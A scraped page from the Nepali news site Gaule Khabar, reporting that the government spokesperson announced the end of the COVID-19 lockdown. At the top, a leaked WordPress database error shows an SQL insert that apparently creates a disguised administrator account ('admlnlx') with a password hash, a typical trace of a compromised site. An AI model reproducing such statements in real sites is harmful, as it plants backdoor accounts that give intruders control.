WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BDSODlS3b51xGYP9s2lh6VSib85lw5.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 04:42:14', '', 'admlnlx', 'admlnlx')

सरकारले भन्यो- लकडाउन अन्त्य भयो (भिडियो (सहित) – Gaule Khabar

सरकारले भन्यो- लकडाउन अन्त्य भयो (भिडियो (सहित)

सरकारले भन्यो- लकडाउन अन्त्य भयो (भिडियो (सहित)

गाउँले न्युज, काठमाडौं । सरकारले कोरोना (कोभिड १९) को महामारी रोकथामका लागि लगाएको लकडाउन अन्त्य भएको बताएको छ ।

आज (मंगलबार) मन्त्रिपरिषदको निर्णय सार्वजनिक गर्न आयोजित पत्रकार सम्मेलनमा सरकारका प्रवक्ता तथा अर्थ र सञ्चार तथा सूचना प्रविधिमन्त्री डा. युवराज खतिवडाले चैत ११ देखि सरकारले लगाएको लकडाउन मंगलबार राति १२ बजेपछि अन्त्य हुने जानकारी दिएका हुन्

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका